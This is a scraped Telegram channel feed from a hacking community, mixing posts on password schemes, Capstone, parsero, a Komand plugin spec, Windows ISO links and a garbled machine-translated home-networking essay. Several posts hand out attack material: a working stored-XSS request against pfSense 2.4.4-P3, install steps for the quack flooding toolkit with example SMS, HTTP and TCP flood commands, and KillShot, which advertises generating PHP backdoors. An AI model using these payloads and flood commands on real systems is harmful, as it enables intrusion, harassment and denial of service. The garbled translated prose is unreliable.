UNDERCODE COMMUNITY
2.67K subscribers
1.23K photos
31 videos
2.65K files
79.8K links
πŸ¦‘ Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
β†’ Undercode.help
Download Telegram
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘I have too many account passwords, what should I do? Teach you to set a complex and memorable password
t.me/undercodeTesting

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

1) The password is set to a universal, easy to remember, but often heard of "crash library" and other cases, breaking the password of a website, all network information is all transparent; password settings are complex and different, for a long time, I forget What password, every time you log in to retrieve the password will waste half a day. The problem of setting a password seems to be simple, but it somewhat troubles our daily life.

2) We do n’t have time to read through cryptography-related professional skills in order to set up a password, and we do n’t want to be easily obtained by those who have misconducted our network information. A simple trick can deal with it. In the process of setting a password, you will find that the combination of letters + numbers + symbols has a high security level, and generally requires 6 digits and more than 8 digits. Then we set the password best to think according to this standard.


πŸ¦‘ 1) The first step is to think of a set of basic codes. It can be a number, a spelling of a name, or an abbreviation of an aphorism, such as: every day upwards-corresponding to "TTXS" or lowercase "ttxs" or 4463 (stroke for each word),

2) The second step is to add a personality classification based on the basic code. For example, the account number related to finance is defined as: FINA or fa, and the definition of non-financial category is: Game, which can be defined by yourself.

3) The third step is to add tags for each website. For example, today's headline: can be identified as TT (the first letter of the headline)

4) Then combine these into a complex and memorable password rule: personality classification + basic code + website mark (location can be changed at will: basic code + personality classification + website mark ) For example: today ’s headline password is OK Set to: fa4463TT (accounts related to finance, the number of strokes every day, the first letter of the headline); the password of Weibo can be set to: Game4463wb (non-financial account, the number of strokes every day, the first of Weibo Abbreviations) We only need to remember our own coding rules.

5) The above method can set up different complex and regular easy-to-remember password series. Don't worry about your password being stolen on a computer or a small book, and don't be afraid that the "crash library" method can easily steal your password, and you don't have to waste time to retrieve the password frequently.

WRITTEN BY UNDERCODE
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ 2020 Verified bug by Undercode
> pfSense 2.4.4-P3 - 'User Manager' Persistent Cross-Site Scripting
t.me/undercodeTesting


# Vulnerability Details
# Description : A persistent cross-site scripting vulnerability exists within the 'User Manager' functionality of the pfSense administration panel.
# Vulnerable Parameter : descr


# POC
# Exploit Details : The following request will create a user in the 'User Manager' functionality with an XSS payload as the Full Name.
# This payload can be triggered by navigating to "https://TARGET/system_usermanager_addprivs.php?userid=0" where userid is
# the id of the user containing the payload.


POST /system_usermanager.php?act=new HTTP/1.1
Host: TARGET
Connection: close
Content-Length: 410
Cache-Control: max-age=0
Origin: https://TARGET
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
Sec-Fetch-Dest: document
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Referer: https://TARGET/system_usermanager.php?act=new
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=ebd302521a887cef99f517e3ac6bdd7d

πŸ¦‘ __csrf_magic=sid%3A3689bbf23a3350994d7543c082fc36d16397208d%2C1585881631&usernamefld=TEST&passwordfld1=password&passwordfld2=password&descr=%3Cimg+src%3D%2F+onerror%3Dalert%281%29%3E&expires=&webguicss=pfSense.css&webguifixedmenu=&webguihostnamemenu=&dashboardcolumns=2&name=&caref=5e643dcfd524e&keylen=2048&lifetime=3650&authorizedkeys=&ipsecpsk=&act=&userid=&privid=&certid=&utype=user&oldusername=&save=Save


πŸ¦‘Please USE FOR LEARN NOT FOR STEAL Β»

@UNDERCODEOFFICIAL
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ A Penetration Testing Framework, Information gathering tool & Website Vulnerability Scanner
instagram.com/undercodeTesting

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

Why KillShot ?

You Can use this tool to Spider your website and get important information and gather information automaticaly using whatweb-host-traceroute-dig-fierce-wafw00f or to Identify the cms and to find the vulnerability in your website using Cms Exploit Scanner && WebApp Vul Scanner Also You can use killshot to Scan automaticly multiple type of scan with nmap and unicorn . And With this tool You can Generate PHP Simple Backdoors upload it manual and connect to the target using killshot

πŸ¦‘π•€β„•π•Šπ•‹π”Έπ•ƒπ•ƒπ•€π•Šπ”Έπ•‹π•€π•†β„• & β„π•Œβ„• :

Linux Setup
1) git clone https://github.com/bahaabdelwahed/killshot

2) cd killshot
ruby setup.rb (if setup show any error just try to install the gems/tool manual )
ruby killshot.rb

> Windows Setup

1) Download ruby for windows ==> https://rubyinstaller.org/downloads/

2) Download Cmder here ==> http://cmder.net/

3) Download Curl For 64/32 ==> https://curl.haxx.se/windows/

4) Download nmap ==> https://nmap.org/download.html
Enjoy !


πŸ¦‘FEATURES :
[0] Nmap Scan
[1] Unicorn Scan
Nmap Scan
[2] Nmap Os Scan
[3] Nmap TCP Scan
[4] Nmap UDB Scan
[5] Nmap All scan
[6] Nmap Http Option Scan
[7] Nmap Live target In Network
Unicorn Scan
[8] Services OS
[9] TCP SYN Scan on a whole network
[01] UDP scan on the whole network

▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘2020 - Capstone disassembly/disassembler framework: Core (Arm, Arm64, BPF, EVM, M68K, M680X, MOS65xx, Mips, PPC, RISCV, Sparc, SystemZ, TMS320C64x, Web Assembly, X86, X86_64, XCore) + bindings.
twitter.com/undercodeNews

πŸ¦‘ FEATURES :


1) Multi-architectures: Arm, Arm64 (Armv8), BPF, Ethereum Virtual Machine, M68K, M680X, Mips, MOS65XX, PowerPC, RISCV, Sparc, SystemZ, TMS320C64X, Web Assembly, XCore & X86 (include X86_64) (details).

2) Clean/simple/lightweight/intuitive architecture-neutral API.

3) Provide details on disassembled instruction (called β€œdecomposer” by some others).

4) Provide some semantics of the disassembled instruction, such as list of implicit registers read & written.

5) Implemented in pure C language, with bindings for D, Clojure, F#,
6) Common Lisp, Visual Basic, PHP, PowerShell, Haskell, Perl, Python, Ruby, C#, NodeJS, Java, GO, C++, OCaml, Lua, Rust, Delphi, Free Pascal & Vala available.

7) Native support for Windows & *nix (with Mac OSX, iOS, Android, Linux, *BSD & Solaris confirmed).

8) Thread-safe by design.

9) Special support for embedding into firmware or OS kernel.

10) High performance & suitable for malware analysis (capable of handling various X86 malware tricks).

11) Distributed under the open source BSD license.

πŸ¦‘π•€β„•π•Šπ•‹π”Έπ•ƒπ•ƒπ•€π•Šπ”Έπ•‹π•€π•†β„• & β„π•Œβ„• :


Debian/Ubuntu Linux - core engine
NOTE: At the moment only version 2.1.2 is available in Ubuntu/Debian repositories. Version 3.0.4 will be provided later.

Capstone is available in Ubuntu & Debian Linux (testing/sid flavours). Binary package of the core of Capstone can be installed with:

1) $ sudo apt-get install libcapstone2
To write your own tools with Capstone, install the development package with:

2) $ sudo apt-get install libcapstone-dev
2.2 Mac OSX - core engine
Macport users can install the core of Capstone with:

3(3) $ sudo port install capstone
Note that Macport installs libraries into its own directory, so you need to tell applications where to find them, for example with:

4) $ export DYLD_LIBRARY_PATH=/opt/local/lib/:$DYLD_LIBRARY_PATH
Homebrew users can install the core of Capstone with:

5) $ brew install capstone
Note that Homebrew installs libraries into its own directory, so you need to tell applications where to find them, for example with:

6) $ export DYLD_LIBRARY_PATH=/usr/local/opt/capstone/lib/:$DYLD_LIBRARY_PATH

@UndercodeOfficial
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ How to Robots.txt file of a web server and looks at the Disallow entries ?
t.me/undercodeTesting

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

1) sudo setup.py install
By using pip3

2) sudo apt-get install python3-pip

3) sudo pip3 install parsero

πŸ¦‘ In Kali Linux

1) sudo apt-get update

2) sudo apt-get install parsero

$ parsero -h

πŸ¦‘ usage: parsero.py [-h] [-u URL] [-o] [-sb]

optional arguments:
-h, --help show this help message and exit
-u URL Type the URL which will be analyzed
-o Show only the "HTTP 200" status code
-sb Search in Bing indexed Disallows
-f FILE Scan a list of domains from a list


@UndercodeOfficial
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ 2020 Updated Automated All-in-One OS command injection and exploitation tool.
t.me/undercodeTesting

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

1) git clone https://github.com/commixproject/commix.git

2) To get a list of all options and switches use:

> python commix.py -h

πŸ¦‘Usage: python commix.py [option(s)]

Options:
-h, --help Show help and exit.

General:
These options relate to general matters.

-v VERBOSE Verbosity level (0-4, Default: 0).
--install Install 'commix' to your system.
--version Show version number and exit.
--update Check for updates (apply if any) and exit.
--output-dir=OUT.. Set custom output directory path.
-s SESSION_FILE Load session from a stored (.sqlite) file.
--flush-session Flush session files for current target.
--ignore-session Ignore results stored in session file.
-t TRAFFIC_FILE Log all HTTP traffic into a textual file.
--batch Never ask for user input, use the default behaviour.
--encoding=ENCOD.. Force character encoding used for data retrieval (e.g.
GBK).
--charset=CHARSET Time-related injection charset (e.g.
"0123456789abcdef")
--check-internet Check internet connection before assessing the target.

Target:
This options has to be provided, to define the target URL.

-u URL, --url=URL Target URL.
--url-reload Reload target URL after command execution.
-l LOGFILE Parse target from HTTP proxy log file.
-m BULKFILE Scan multiple targets given in a textual file.
-r REQUESTFILE Load HTTP request from a file.
--crawl=CRAWLDEPTH Crawl the website starting from the target URL (1-2,
Default: 0).
-x SITEMAP_URL Parse target(s) from remote sitemap(.xml) file.

@UndercodeOfficial
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
This media is not supported in your browser
VIEW IN TELEGRAM
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ 2020 ADB-Toolkit V2 for easy ADB tricks with many perks in all one tested
t.me/undercodeTesting

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

1) git clone https://github.com/ASHWIN990/ADB-Toolkit.git

2) cd ADB-Toolkit

3) sudo chmod +x install.sh

4) sudo ./install.sh -i "or" sudo bash install.sh -i

πŸ¦‘Usage

5) sudo ./ADB-Toolkit.sh

or you can do

6) sudo bash ADB-Toolkit.sh

or you can also do

7) sudo adb-toolkit any where in shell

@UndercodeOfficial
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ To generate a plugin using only the SDK alone, and not a part of the Komand Platform, you can use the following code :
t.me/undercodeTesting

plugin_spec_version: v2
name: example
description: "Example plugin"
version: 1.0.0
## Actions
### Say Goodbye
This action is used to say goodbye to a name.

#### Input

|Name|Type|Default|Required|Description|Enum|
|----|----|-------|--------|-----------|----|
|name|string|None|False|Name to say goodbye to|None|

#### Output

|Name|Type|Required|Description|
|----|----|--------|-----------|
|message|string|False|None|
|time|date|False|None|

### Wave
This action is used to wave a user specified number of times.
#### Input

|Name|Type|Default|Required|Description|Enum|
|----|----|-------|--------|-----------|----|
|count|integer|None|False|None|None|

#### Output

|Name|Type|Required|Description|
|----|----|--------|-----------|
|message|string|False|None|

## Triggers
### Emit Greeting
This trigger is used to triggers a greeting every interval seconds (by default, 15 seconds).
#### Input

|Name|Type|Default|Required|Description|Enum|
|----|----|-------|--------|-----------|----|
|interval|integer|15|False|How often (in seconds) to trigger a greeting|None|

#### Output

|Name|Type|Required|Description|
|----|----|--------|-----------|
|greeting|string|False|None|
|time|date|False|None|

## Connection
The connection configuration accepts the following parameters:

|Name|Type|Default|Required|Description|Enum|
|----|----|-------|--------|-----------|----|
|hostname|string|None|False|None|None|

## Troubleshooting
This plugin does not contain any troubleshooting information.

## Workflows
Examples:
* Testing

## References
* [Komand](https://www.komand.com/)

connection:
hostname:
type: string

triggers:
emit_greeting:
description: "Triggers a greeting every Interval seconds (by default, 15 seconds)"
input:
interval:
type: integer
description: "How often (in seconds) to trigger a greeting"
default: 15
output:
greeting:
type: string
time:
type: date
actions:
wave:
description: "Wave"
input:
count:
type: integer
output:
message:
type: string
say_goodbye:
description: "Say goodbye"
input:
name:
type: string
description: "Name to say goodbye to"
output:
message:
type: string
time:
type: date

πŸ¦‘ E N J O Y

@UndercodeOfficial
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
This media is not supported in your browser
VIEW IN TELEGRAM
πŸ¦‘ Will send some courses later
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ ALL VERSION Win 10 Official Microsoft EXPIRE 24 HOURS :


πŸ¦‘ ALL 64 BIT
https://software-download.microsoft.com/pr/Win10_1909_English_x64.iso?t=4d0124f1-5d65-4258-8a00-45f160e43a4e&e=1586907395&h=af280341c29b101a98166b3164cebfd1


πŸ¦‘ ALL 32 BIT

https://software-download.microsoft.com/pr/Win10_1909_English_x32.iso?t=4d0124f1-5d65-4258-8a00-45f160e43a4e&e=1586907395&h=432f0e496517d7310bbb7930cf5e851e

▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘2020 SMS attack tool, HTTP attack tool and many other attack tools
t.me/undercodeTesting

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

1) git clone https://github.com/entynetproject/quack

2) cd quack

3) chmod +x install.sh

4) ./install.sh

πŸ¦‘ quack -h

usage: quack [-h] [--target <IP:port/URL/phone>]
[--tool [SMS|NTP|TCP|UDP|SYN|POD|SLOWLORIS|MEMCACHED|HTTP|NJRAT]]
[--timeout <timeout>] [--threads <threads>] [-u] [--version]

optional arguments:
-h, --help show this help message and exit
--target <IP:port/URL/phone>
Target IP:port, URL or phone.
--tool [SMS|NTP|TCP|UDP|SYN|POD|SLOWLORIS|MEMCACHED|HTTP|NJRAT]
Attack tool.
--timeout <timeout> Timeout in secounds.
--threads <threads> Threads count.
-u, --update Update Quack Toolkit.
--version Show Quack Toolkit version.

5) Example of the SMS attack
quack --tool SMS --target 15554443333 --time 10 --threads 10

> Example of the HTTP attack
quack --tool HTTP --target example.com --time 10 --threads 10

> Example of the TCP attack
quack --tool TCP --target 192.168.1.100:80 --time 10 --threads 10

@UndercodeOfficial
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ Network configuration-the arrival of home network full by Undercode
t.me/UndercodeTesting

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

1) today, those of us who have spare money (sometimes Need very much (More) people started to try to network interactive housing. In the new housing, 10BaseT or even 100 trillion 100BaseT RJ-45 sockets will be everywhere like telephone sockets.

2) Home network also has some disadvantages. First, we do n’t have a technical department at home Support. In addition, network hardware and software may be expensive. Therefore, the advantages of the network must be removed from the cost of installation and maintenance.


πŸ¦‘ Choose a network solution

1) Let's examine the possible solutions suitable for home networks. It should be pointed out that the PC industry is mature, and a variety of network options are increasing. They range from simple plug-and-play printer sharing networks to firewall protection and server support. Intranet.

2) Generally speaking, the more powerful the network, the higher the cost and management complexity, and the correct method is to always select the network with the functions you need. Common home operating systems and two uncommon network solutions-Linux and Microsoft NT:

πŸ¦‘ Linux Unix NT Win95 Mac OS / 2

1) Printer services xxxxxx
File server / sharing x * * * * *
Mail server x * * *--
Domain Name Server xx * * * *
Web Server xx * * * *
Firewall x * * *--
Routing xxx---
Gateway xxx---
Internet xxxxxx
Ethernet xxxxxx
Token Ring x * * * * *
Arcnet x * * * * *
Framerelay x * *---
ISDN x * * *--
PPP xxxxxx
SLIP xxxxxx
TCP / IP xxxxxx
X.25 x * * * * *
IPX (Novell Netware) xxxx * *
SMB (Windows network) xxxx * *
Appletalk x * * * x *
NFS xx * * * *


πŸ¦‘ x Supported by the system itself
* Need additional support
-not supported

2) After comparison of chart functions, some systems have been disregarded. If you are not using this It ’s a pity, but it ’s best to discuss with the OEM, since even they all recommend you to replace it. In addition, all kinds of UNIX are included in a UNIX column, except Linux.

3) Linux started in 1991 and is different from other Unix on several important issues. Linux is a clone of Unix, drafted by Linus Torvalds and assisted by a loosely integrated development team on the Internet.

4) Linux is (and will always be) Free software, with very few restrictions (see GNU's General Public License), has grown into a full-fledged high-performance Unix, originally based on Inter 386, and is now suitable for more systems than any other operating system. Linux is not The only Unix-like free software, but it currently seems to have the best support. He can get good support from the online development team, there are a lot of documents in the form of HOWTO files, FAQ files and Unix help files, and can be online Freely available. A Linux package with an operating system and other full-featured software can be purchased for a CD for less than $ 30 or downloaded for free from the Internet.

5) For file services, printing services, mail services, gateways and routing, use Linux or even Only one 386 can be efficiently implemented. Linux is extremely robust, and many Linux in the world and its operation will not crash or restart for a year. I do n’t believe any Windows or Macintosh product can Do it.

6) Windows NT, the network-oriented operating system provided by Microsoft, was also born in 1991. To get all the features listed above will easily cost you more than $ 1,000. It has good support, and to replace Unix as online He will consider implementing it on various systems. At present, it has not provided complete network functions like Unix or Linux, but it will be done soon. There is no doubt that the prospect of NT with the support of Microsoft is bright. .
7) Unix is ​​of course an excellent network system. In fact, Unix is ​​the "war horse" of the Internet. All Internet-based protocols and services are developed on Unix. Due to the maturity of Unix, it has passed the growth that NT is now experiencing Pain, such as security or crash issues. Although many years ago it was predicted that the role of Unix will gradually decline, it is still steadily increasing. Before Linux, there was no affordable Unix for home use. It has the functions listed above Unix generally costs at least $ 2,000, and the complexity of Unix prevents its widespread use, only for universities and large commercial companies.

πŸ¦‘WAHT ABOUT WINDOWS ?

1) win 10., Windows 95, Macintosh, and OS / 2 also provide certain network functions and use additional software It can also provide functions such as print services, file services, mail services, name services, firewalls and web servers. None of them are designed to support dense network services, but they can also do very well with the correct software and hardware.

2) Good. They can be configured for $ 500 to achieve the above functions, and the basic system is generally pre-installed in the PC, and it is easy to install and configure.

3) At present, choosing a network solution is extremely dependent on Because of your network needs and budget. Obviously, unless you are in a family business here, we will not pay a lot of money for this. The model now has almost the most powerful and economical choice.

4) Linux provides the power of Unix, and The more sophisticated installation program is easier to install and manage. In fact, if you have the time, patience, hard disk and Internet connection, you can choose one of many FTP accounts to download Linux. Seeing this, you will Strange why Linux is not more popular? In fact, there are about 8 million computers running Linux, including more than 40% of ISPs, large companies, and government agencies like NASA (NASA recently used a Linux on the space shuttle. The computer was tested).

πŸ¦‘ Specific method of Linux networking

1) Assuming you do decide to build a home network with Linux, the first thing is to find available hardware. Now this is no longer a problem. In the past five years, Linux has been able to support almost all PC configurations, and as mentioned above, an old 386 can support a home network of 5 or more computers. Linux can run on any 386 / 486/586 / Pentium-class processors (including AMD, Cyrix), as well as Dec Alpha, PowerPC (Mklinux for Apple), M68xxx (Amiga, Atari), Sun SPARC, and MIPS. 386-based systems require a minimum of 4M memory Better) and 50M hard disk space (200M is better). Of course, the system chamber of Linux running on 386 / 4M / 20M is very slow, 8M memory and 50M hard disk are more realistic minimum requirements. If you have already thrown such a PC It ’s in the trash, hurry up and pick it up, she will work very well. The more popular set of Linux with user manuals is now available in bookstores.

2) If you have a Macintosh and PC at home, do n’t worry, Linux can work Most home operating systems live in harmony. Linux can recognize the network protocols and file systems of most systems on the Internet: MS D OS, Windows for Workgroups, Win95, Win NT, Mac OS, OS / 2, Novell, Amiga, VAX and Unix. The HOWTO documents available on the Internet detail how to support them.


3) Next you need to choose a network connection. Ethernet may be the cheapest, and even slow Ethernet can provide the performance that homes need. Fast Ethernet (100Mbps) has quickly become a commercial standard, and it is also for home Affordable. Ethernet cards range from a $ 20 8-bit 10M ISA card to a $ 100 100M network card.

4) 10Base2 seems to be a good choice for a home network, but 10BaseT is also good. 10Base2 connects the computer with thin cables in a daisy chain way To the Internet. The cable must be connected from beginning to end, and a 50 ohm terminator must be added to each end.
5) If you are decorating, you can easily install the 10BaseT network. If you use Category 5 cable, you can easily upgrade to Fast Ethernet in the future. A 10BaseT system with more than two nodes requires a Hub, and Category 5 cable is not cheap (40 cents per foot), so installing 10BaseT will cost more, but it will last longer and be more convenient than 10Base2. Linux supports almost any card, there is no need to worry about more.

6) Linux server for all home computer gateway to the Internet. this needs to be connected to a local ISP to provide IP addresses (preferably a static address) to the gateway .Internet connection You can use modem, ISDN, Frame Relay or ATM. Linux also provides a firewall to break into your home network from the Internet. Using a method called IP mask, Linux can only have a legal IP address and domain name Allow all computers to access the Internet. It makes all TCP / IP communications on your home network seem to come from your Linux computer.

6) When information is returned from other places, Linux plays the role of a post office and distributes the information to The right computer. Linux can easily support 2-5 computers to access the Internet through a 28.8 modem at the same time. Linux computers can also provide mail services, so that you can have as many e-mail addresses as you need. All of them only need one ISP Connected ordinary PPP or SLIP link. No additional e-mail service or subnet fee, because all the functions are provided by your Linux server.

7) Are you tired of having only one computer to surf the Internet or pay for multiple accounts? Let Linux help you.


8) Linux computers will provide printing and file services. The free software package Samba supports the SMB protocol for Win95 and WFW. Many large companies use Samba on their networks. After configuration, it will integrate flawlessly into the Windows system, allowing each network user Have independent or shared space, and develop and use printers (or network printers) on Linux servers.

9) Like all other Linux software, Samba is also freely available online, including complete installation instructions and source code, and is active In development and maintenance. Linux has another similar package Netatalk provides similar support for the Apple Localtalk protocol. A tape backup system can be installed on the Linux server to automatically back up your server.

10) Linux provides all traditional Unix network services. Sendmail or smail is completed. So all users on the system can have an e-mail address. Use the POP3 protocol to access e-mail accounts using e-mail client programs such as Eudora or Pegasus on the network. named can be provided. If you have several small networks or different network types, Linux can be used as a gateway to contact all subnets Together.

11) You can also use the core path to have Linux as a firewall and control the use of the Internet. NFS, a network file system, allowing computers to mount disk drives from remote machines. All packages of Linux support NFS, while other systems require additional software. Linux of course also supports other standard network applications used on the TCP / IP network: FTP, telnet, remote shell, ping, etc.

12) Linux also provides web servers and Java development systems. Several web servers are available on Linux, of which the most popular It is Apache. On the Internet, 45% of the web servers are Apache. Sun Microsystems provides JDK and Java compilers to develop Java programs. In fact, Java can be compiled into the Linux system, allowing the server to run native Java code. Most other operating systems are still only discussing this feature.

πŸ¦‘ So, where is the trap?

1) Now you may be wondering what is the hidden danger of Linux. In fact There is no real hidden danger. Linux is much more mature and faster than other well-supported systems such as NT. Windows NT has just announced a multi-processor system that supports eight CPUs. Linux supports Intel ’s SMP multi-processor Standardize and provide support for up to 20 CPUs on a single system.